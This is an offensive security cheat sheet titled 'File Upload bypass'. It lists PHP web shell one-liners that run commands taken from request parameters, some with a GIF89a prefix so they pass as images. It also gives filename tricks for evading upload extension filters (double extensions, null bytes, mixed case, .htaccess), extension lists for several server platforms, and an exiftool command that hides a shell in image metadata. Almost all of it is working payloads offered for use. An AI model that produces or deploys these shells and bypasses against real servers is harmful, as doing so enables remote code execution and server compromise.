File Upload bypass
GIF89a1<?php $a=system($_GET['cmd']); echo $a;?><?php system('whoami'); ?><?php exec('whoami'); ?><?php passthru('whoami'); ?><?php shell_exec('whoami'); ?><?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?><?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
evil.png;.phpevil.gif.phpevil.gif.php5evil.php;gifevil.configevil.htaccess​--other-extensions--php3php4php5php7phtphtmphtmlpharphps
Other extensions
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .incASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtmlJsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .actionColdfusion: .cfm, .cfml, .cfc, .dbmFlash: .swfPerl: .pl, .cgiErlang Yaws Web Server: .yaws
-Try upper cases: pHp, .pHP5, .PhAr ... -Add a valid extension before the execution extension: file.png.Php5 -Add special characters at the end. Use burpsuite-intruder to make it easy.
file.php%20file.php%0afile.php%00file.php%0d%0afile.php/file.php.\file.file.php....file.pHp5....
-Try to bypass the protections tricking the extension parser of the server-side with techniques like doubling the extension or adding junk data (null bytes) between extensions.
file.png.phpfile.png.pHp5file.php%00.pngfile.php\x00.pngfile.php%0a.pngfile.php%0d%0a.pngflile.phpJunk123png
exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png
safe_mode = Offdisable_functions = NONEsafe_mode_gid = OFFopen_basedir = OFFexec = ONshell_exec = ON
​
Last updated 4 months ago